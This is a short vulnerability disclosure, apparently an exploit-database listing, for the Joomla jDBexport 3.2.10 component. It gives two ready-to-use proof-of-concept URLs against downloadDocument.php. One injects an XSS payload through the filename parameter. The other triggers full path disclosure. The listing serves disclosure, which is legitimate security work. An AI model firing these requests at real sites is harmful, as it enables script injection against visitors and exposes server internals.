Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure

Joomla jDBexport component version 3.2.10 suffers from cross site scripting and path disclosure vulnerabilities.


MD5 | 2723a152193a0bca3bebed06e7adad35

# Exploit Title: Joomla Component jDBexport 3.2.10 - Cross-site scripting / Full Path Disclosure
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jdbexport/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# Date: 2017-04-26

# POC :
# filename Parameter Vulnerable to Cross-site scripting :
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=xls&filename=%3Cimg%20src=%221%22%20onerror=alert%28%22XSS%22%29%3E5d0eb34b31&debugcomponent=1


# Full Path Disclosure
https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=php&filename=[]&debugcomponent=1

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers

Related Posts